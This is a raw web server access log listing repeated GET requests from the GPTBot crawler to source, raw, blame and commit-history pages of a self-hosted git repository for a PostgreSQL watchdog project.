"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:13:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 215878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:13:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 117986] [Gzip 19.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:13:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" -[17/Feb/2026:13:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 9872] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:13:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 63765] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:13:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 212038] [Gzip 17.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:13:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" -[17/Feb/2026:13:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 436304] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" -[17/Feb/2026:13:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 83168] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:13:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 872714] [Gzip 23.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" -[17/Feb/2026:13:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10902] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist" -[17/Feb/2026:13:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 10127] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" -[17/Feb/2026:13:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 16594] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:13:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29880] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 10817] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:13:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 10823] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:13:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 10826] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:13:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 10818] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" -[17/Feb/2026:13:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15779] [Gzip 4.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:13:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 9865] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:13:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 215878] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:13:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10177] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9512] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 212002] [Gzip 17.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:13:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode" -[17/Feb/2026:13:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 9877] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:13:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 9866] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" -[17/Feb/2026:13:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 9899] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" -[17/Feb/2026:13:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 436304] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" -[17/Feb/2026:13:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 872694] [Gzip 23.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" -[17/Feb/2026:13:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42720] [Gzip 22.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10425] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 166027] [Gzip 20.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:13:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1135869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:13:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17381] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:13:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1765721] [Gzip 21.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:13:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 525775] [Gzip 23.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:13:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 76184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:13:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 299024] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:13:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 9869] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:13:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 9875] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:13:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15747] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" -[17/Feb/2026:13:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15944] [Gzip 8.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" -[17/Feb/2026:13:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 3799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 